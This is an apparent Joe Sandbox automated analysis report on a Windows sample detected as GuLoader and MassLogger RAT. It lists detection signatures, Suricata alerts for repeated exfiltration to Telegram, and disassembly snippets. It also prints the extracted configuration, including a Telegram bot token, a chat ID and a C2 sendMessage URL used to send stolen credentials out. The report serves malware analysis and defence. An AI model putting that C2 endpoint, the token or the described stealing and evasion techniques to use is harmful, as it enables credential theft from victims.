Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
b5BQbAhwVD.exe

Overview

General Information

Sample name:b5BQbAhwVD.exe
renamed because original name is a hash value
Original sample name:d314fe716123c0fac98d48d7d4acd4fe887217c2a9ad0fc96850235785f7f79b.exe
Analysis ID:1588212
MD5:8e4a2b26b311d9e5c9a920186b0b8025
SHA1:f433a5c5020d31b0278b659e01cbb3882c671487
SHA256:d314fe716123c0fac98d48d7d4acd4fe887217c2a9ad0fc96850235785f7f79b
Tags:exeGuLoaderuser-adrian__luca
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • b5BQbAhwVD.exe (PID: 1280 cmdline: "C:\Users\user\Desktop\b5BQbAhwVD.exe" MD5: 8E4A2B26B311D9E5C9A920186B0B8025)
    • b5BQbAhwVD.exe (PID: 6424 cmdline: "C:\Users\user\Desktop\b5BQbAhwVD.exe" MD5: 8E4A2B26B311D9E5C9A920186B0B8025)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.3386208484.00000000338EB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000003.00000002.3386208484.00000000338EB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000002.3386208484.00000000338EB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000000.00000002.2385539475.0000000003DC5000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: b5BQbAhwVD.exe PID: 6424JoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            Click to see the 2 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T22:43:38.290741+010020577441Malware Command and Control Activity Detected192.168.2.649964149.154.167.220443TCP
            2025-01-10T22:43:40.403998+010020577441Malware Command and Control Activity Detected192.168.2.649978149.154.167.220443TCP
            2025-01-10T22:43:42.193783+010020577441Malware Command and Control Activity Detected192.168.2.649989149.154.167.220443TCP
            2025-01-10T22:43:44.155656+010020577441Malware Command and Control Activity Detected192.168.2.649992149.154.167.220443TCP
            2025-01-10T22:43:45.707079+010020577441Malware Command and Control Activity Detected192.168.2.649995149.154.167.220443TCP
            2025-01-10T22:43:47.355654+010020577441Malware Command and Control Activity Detected192.168.2.649997149.154.167.220443TCP
            2025-01-10T22:43:48.810566+010020577441Malware Command and Control Activity Detected192.168.2.649999149.154.167.220443TCP
            2025-01-10T22:43:50.501847+010020577441Malware Command and Control Activity Detected192.168.2.650001149.154.167.220443TCP
            2025-01-10T22:43:52.514440+010020577441Malware Command and Control Activity Detected192.168.2.650003149.154.167.220443TCP
            2025-01-10T22:43:53.963506+010020577441Malware Command and Control Activity Detected192.168.2.650005149.154.167.220443TCP
            2025-01-10T22:43:55.399919+010020577441Malware Command and Control Activity Detected192.168.2.650007149.154.167.220443TCP
            2025-01-10T22:43:56.922750+010020577441Malware Command and Control Activity Detected192.168.2.650009149.154.167.220443TCP
            2025-01-10T22:43:58.556032+010020577441Malware Command and Control Activity Detected192.168.2.650011149.154.167.220443TCP
            2025-01-10T22:44:00.306097+010020577441Malware Command and Control Activity Detected192.168.2.650013149.154.167.220443TCP
            2025-01-10T22:44:01.880986+010020577441Malware Command and Control Activity Detected192.168.2.650015149.154.167.220443TCP
            2025-01-10T22:44:03.565415+010020577441Malware Command and Control Activity Detected192.168.2.650017149.154.167.220443TCP
            2025-01-10T22:44:05.137762+010020577441Malware Command and Control Activity Detected192.168.2.650019149.154.167.220443TCP
            2025-01-10T22:44:06.769294+010020577441Malware Command and Control Activity Detected192.168.2.650021149.154.167.220443TCP
            2025-01-10T22:44:08.473446+010020577441Malware Command and Control Activity Detected192.168.2.650025149.154.167.220443TCP
            2025-01-10T22:44:10.067659+010020577441Malware Command and Control Activity Detected192.168.2.650027149.154.167.220443TCP
            2025-01-10T22:44:11.615715+010020577441Malware Command and Control Activity Detected192.168.2.650029149.154.167.220443TCP
            2025-01-10T22:44:13.222558+010020577441Malware Command and Control Activity Detected192.168.2.650031149.154.167.220443TCP
            2025-01-10T22:44:14.906701+010020577441Malware Command and Control Activity Detected192.168.2.650033149.154.167.220443TCP
            2025-01-10T22:44:16.461260+010020577441Malware Command and Control Activity Detected192.168.2.650035149.154.167.220443TCP
            2025-01-10T22:44:18.073657+010020577441Malware Command and Control Activity Detected192.168.2.650037149.154.167.220443TCP
            2025-01-10T22:44:19.745626+010020577441Malware Command and Control Activity Detected192.168.2.650039149.154.167.220443TCP
            2025-01-10T22:44:21.411514+010020577441Malware Command and Control Activity Detected192.168.2.650041149.154.167.220443TCP
            2025-01-10T22:44:23.038141+010020577441Malware Command and Control Activity Detected192.168.2.650043149.154.167.220443TCP
            2025-01-10T22:44:24.633538+010020577441Malware Command and Control Activity Detected192.168.2.650045149.154.167.220443TCP
            2025-01-10T22:44:26.106237+010020577441Malware Command and Control Activity Detected192.168.2.650047149.154.167.220443TCP
            2025-01-10T22:44:27.698587+010020577441Malware Command and Control Activity Detected192.168.2.650049149.154.167.220443TCP
            2025-01-10T22:44:29.441104+010020577441Malware Command and Control Activity Detected192.168.2.650051149.154.167.220443TCP
            2025-01-10T22:44:30.987411+010020577441Malware Command and Control Activity Detected192.168.2.650053149.154.167.220443TCP
            2025-01-10T22:44:32.503707+010020577441Malware Command and Control Activity Detected192.168.2.650055149.154.167.220443TCP
            2025-01-10T22:44:33.964570+010020577441Malware Command and Control Activity Detected192.168.2.650057149.154.167.220443TCP
            2025-01-10T22:44:35.501882+010020577441Malware Command and Control Activity Detected192.168.2.650059149.154.167.220443TCP
            2025-01-10T22:44:37.002302+010020577441Malware Command and Control Activity Detected192.168.2.650061149.154.167.220443TCP
            2025-01-10T22:44:38.669450+010020577441Malware Command and Control Activity Detected192.168.2.650063149.154.167.220443TCP
            2025-01-10T22:44:40.277352+010020577441Malware Command and Control Activity Detected192.168.2.650065149.154.167.220443TCP
            2025-01-10T22:44:41.777070+010020577441Malware Command and Control Activity Detected192.168.2.650068149.154.167.220443TCP
            2025-01-10T22:44:43.444454+010020577441Malware Command and Control Activity Detected192.168.2.650070149.154.167.220443TCP
            2025-01-10T22:44:45.313609+010020577441Malware Command and Control Activity Detected192.168.2.650072149.154.167.220443TCP
            2025-01-10T22:44:46.861010+010020577441Malware Command and Control Activity Detected192.168.2.650074149.154.167.220443TCP
            2025-01-10T22:44:48.356145+010020577441Malware Command and Control Activity Detected192.168.2.650076149.154.167.220443TCP
            2025-01-10T22:44:50.021137+010020577441Malware Command and Control Activity Detected192.168.2.650078149.154.167.220443TCP
            2025-01-10T22:44:51.657111+010020577441Malware Command and Control Activity Detected192.168.2.650080149.154.167.220443TCP
            2025-01-10T22:44:53.187760+010020577441Malware Command and Control Activity Detected192.168.2.650082149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T22:43:30.402572+010028032742Potentially Bad Traffic192.168.2.649910132.226.8.16980TCP
            2025-01-10T22:43:37.277592+010028032742Potentially Bad Traffic192.168.2.649910132.226.8.16980TCP
            2025-01-10T22:43:39.340074+010028032742Potentially Bad Traffic192.168.2.649973132.226.8.16980TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T22:43:24.036995+010028032702Potentially Bad Traffic192.168.2.649869142.250.186.142443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T22:43:37.911520+010018100081Potentially Bad Traffic192.168.2.649964149.154.167.220443TCP
            2025-01-10T22:43:39.938527+010018100081Potentially Bad Traffic192.168.2.649978149.154.167.220443TCP
            2025-01-10T22:43:41.885949+010018100081Potentially Bad Traffic192.168.2.649989149.154.167.220443TCP
            2025-01-10T22:43:43.707201+010018100081Potentially Bad Traffic192.168.2.649992149.154.167.220443TCP
            2025-01-10T22:43:45.360498+010018100081Potentially Bad Traffic192.168.2.649995149.154.167.220443TCP
            2025-01-10T22:43:46.930726+010018100081Potentially Bad Traffic192.168.2.649997149.154.167.220443TCP
            2025-01-10T22:43:48.575526+010018100081Potentially Bad Traffic192.168.2.649999149.154.167.220443TCP
            2025-01-10T22:43:50.047051+010018100081Potentially Bad Traffic192.168.2.650001149.154.167.220443TCP
            2025-01-10T22:43:52.277358+010018100081Potentially Bad Traffic192.168.2.650003149.154.167.220443TCP
            2025-01-10T22:43:53.729116+010018100081Potentially Bad Traffic192.168.2.650005149.154.167.220443TCP
            2025-01-10T22:43:55.173244+010018100081Potentially Bad Traffic192.168.2.650007149.154.167.220443TCP
            2025-01-10T22:43:56.652227+010018100081Potentially Bad Traffic192.168.2.650009149.154.167.220443TCP
            2025-01-10T22:43:58.160008+010018100081Potentially Bad Traffic192.168.2.650011149.154.167.220443TCP
            2025-01-10T22:43:59.932227+010018100081Potentially Bad Traffic192.168.2.650013149.154.167.220443TCP
            2025-01-10T22:44:01.623949+010018100081Potentially Bad Traffic192.168.2.650015149.154.167.220443TCP
            2025-01-10T22:44:03.134782+010018100081Potentially Bad Traffic192.168.2.650017149.154.167.220443TCP
            2025-01-10T22:44:04.758561+010018100081Potentially Bad Traffic192.168.2.650019149.154.167.220443TCP
            2025-01-10T22:44:06.367104+010018100081Potentially Bad Traffic192.168.2.650021149.154.167.220443TCP
            2025-01-10T22:44:08.066307+010018100081Potentially Bad Traffic192.168.2.650025149.154.167.220443TCP
            2025-01-10T22:44:09.672750+010018100081Potentially Bad Traffic192.168.2.650027149.154.167.220443TCP
            2025-01-10T22:44:11.303252+010018100081Potentially Bad Traffic192.168.2.650029149.154.167.220443TCP
            2025-01-10T22:44:12.813731+010018100081Potentially Bad Traffic192.168.2.650031149.154.167.220443TCP
            2025-01-10T22:44:14.526148+010018100081Potentially Bad Traffic192.168.2.650033149.154.167.220443TCP
            2025-01-10T22:44:16.120073+010018100081Potentially Bad Traffic192.168.2.650035149.154.167.220443TCP
            2025-01-10T22:44:17.685248+010018100081Potentially Bad Traffic192.168.2.650037149.154.167.220443TCP
            2025-01-10T22:44:19.289499+010018100081Potentially Bad Traffic192.168.2.650039149.154.167.220443TCP
            2025-01-10T22:44:20.978871+010018100081Potentially Bad Traffic192.168.2.650041149.154.167.220443TCP
            2025-01-10T22:44:22.609261+010018100081Potentially Bad Traffic192.168.2.650043149.154.167.220443TCP
            2025-01-10T22:44:24.287303+010018100081Potentially Bad Traffic192.168.2.650045149.154.167.220443TCP
            2025-01-10T22:44:25.834440+010018100081Potentially Bad Traffic192.168.2.650047149.154.167.220443TCP
            2025-01-10T22:44:27.319081+010018100081Potentially Bad Traffic192.168.2.650049149.154.167.220443TCP
            2025-01-10T22:44:28.908906+010018100081Potentially Bad Traffic192.168.2.650051149.154.167.220443TCP
            2025-01-10T22:44:30.704871+010018100081Potentially Bad Traffic192.168.2.650053149.154.167.220443TCP
            2025-01-10T22:44:32.205043+010018100081Potentially Bad Traffic192.168.2.650055149.154.167.220443TCP
            2025-01-10T22:44:33.725897+010018100081Potentially Bad Traffic192.168.2.650057149.154.167.220443TCP
            2025-01-10T22:44:35.183983+010018100081Potentially Bad Traffic192.168.2.650059149.154.167.220443TCP
            2025-01-10T22:44:36.713518+010018100081Potentially Bad Traffic192.168.2.650061149.154.167.220443TCP
            2025-01-10T22:44:38.299101+010018100081Potentially Bad Traffic192.168.2.650063149.154.167.220443TCP
            2025-01-10T22:44:39.887149+010018100081Potentially Bad Traffic192.168.2.650065149.154.167.220443TCP
            2025-01-10T22:44:41.504856+010018100081Potentially Bad Traffic192.168.2.650068149.154.167.220443TCP
            2025-01-10T22:44:43.037460+010018100081Potentially Bad Traffic192.168.2.650070149.154.167.220443TCP
            2025-01-10T22:44:44.746296+010018100081Potentially Bad Traffic192.168.2.650072149.154.167.220443TCP
            2025-01-10T22:44:46.512673+010018100081Potentially Bad Traffic192.168.2.650074149.154.167.220443TCP
            2025-01-10T22:44:48.048135+010018100081Potentially Bad Traffic192.168.2.650076149.154.167.220443TCP
            2025-01-10T22:44:49.593350+010018100081Potentially Bad Traffic192.168.2.650078149.154.167.220443TCP
            2025-01-10T22:44:51.329486+010018100081Potentially Bad Traffic192.168.2.650080149.154.167.220443TCP
            2025-01-10T22:44:52.859130+010018100081Potentially Bad Traffic192.168.2.650082149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: b5BQbAhwVD.exeAvira: detected
            Source: 00000003.00000002.3386208484.00000000338EB000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
            Source: b5BQbAhwVD.exe.6424.3.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
            Source: b5BQbAhwVD.exeVirustotal: Detection: 76%Perma Link
            Source: b5BQbAhwVD.exeReversingLabs: Detection: 60%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_3387D1EC CryptUnprotectData,3_2_3387D1EC
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_3387D9D9 CryptUnprotectData,3_2_3387D9D9
            Source: b5BQbAhwVD.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49921 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.6:49869 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.18.97:443 -> 192.168.2.6:49875 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49964 version: TLS 1.2
            Source: b5BQbAhwVD.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AFA
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_00402868 FindFirstFileW,3_2_00402868
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_0040672B FindFirstFileW,FindClose,3_2_0040672B
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405AFA
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 33870671h3_2_338703AF
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 3387C985h3_2_3387C638
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 33871042h3_2_33870C28
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 3387EEA0h3_2_3387EBF2
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 3387E5F0h3_2_3387E339
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 3387DD40h3_2_3387DA89
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 3387C499h3_2_3387C1F2
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 3387BBE9h3_2_3387B944
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 3387F2F8h3_2_3387F042
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 3387B339h3_2_3387B07F
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 3387EA48h3_2_3387E790
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 33871042h3_2_33870F6F
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 3387E198h3_2_3387DEE1
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 3387C041h3_2_3387BD88
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 3387B791h3_2_3387B4EC
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 33871042h3_2_33870C1B
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then push 00000000h3_2_35AFBDF0
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 35AF16A8h3_2_35AF1400
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 35AF882Dh3_2_35AF8650
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 35AF91B7h3_2_35AF8650
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 35AF5058h3_2_35AF4DB0
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 35AF2808h3_2_35AF2560
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 35AF1F58h3_2_35AF1CB0
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 35AF7770h3_2_35AF74C8
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 35AF6EC0h3_2_35AF6C18
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 35AF1250h3_2_35AF0FA8
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 35AF6A68h3_2_35AF67C0
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 35AF61B8h3_2_35AF5F10
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 35AF4218h3_2_35AF3F70
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 35AF3968h3_2_35AF36C0
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 35AF30B8h3_2_35AF2E10
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 35AF5908h3_2_35AF5660
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 35AF2C60h3_2_35AF29B8
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 35AF23B0h3_2_35AF2108
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 35AF4ACAh3_2_35AF4820
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 35AF7318h3_2_35AF7070
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 35AF1B00h3_2_35AF1858
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 35AF4670h3_2_35AF43C8
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 35AF3DC0h3_2_35AF3B18
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 35AF6610h3_2_35AF6368
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_35AF7B4F
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 35AF5D60h3_2_35AF5AB8
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 35AF54B0h3_2_35AF5208
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then jmp 35AF3510h3_2_35AF3268
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then push 00000000h3_2_3627E7C8
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]3_2_3627F5D8
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 4x nop then push 00000000h3_2_3627F316

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:49964 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:49964 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50001 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:49978 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:49992 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50025 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50001 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50027 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50011 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50025 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50027 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:49992 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50033 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50005 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:49978 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50031 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50011 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50033 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50019 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50005 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50045 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:49989 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50031 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50019 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50061 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50045 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:49989 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50009 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50055 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50061 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50009 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50003 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50015 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50055 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:49999 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50003 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50041 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:49999 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50041 -> 149.154.167.220:443
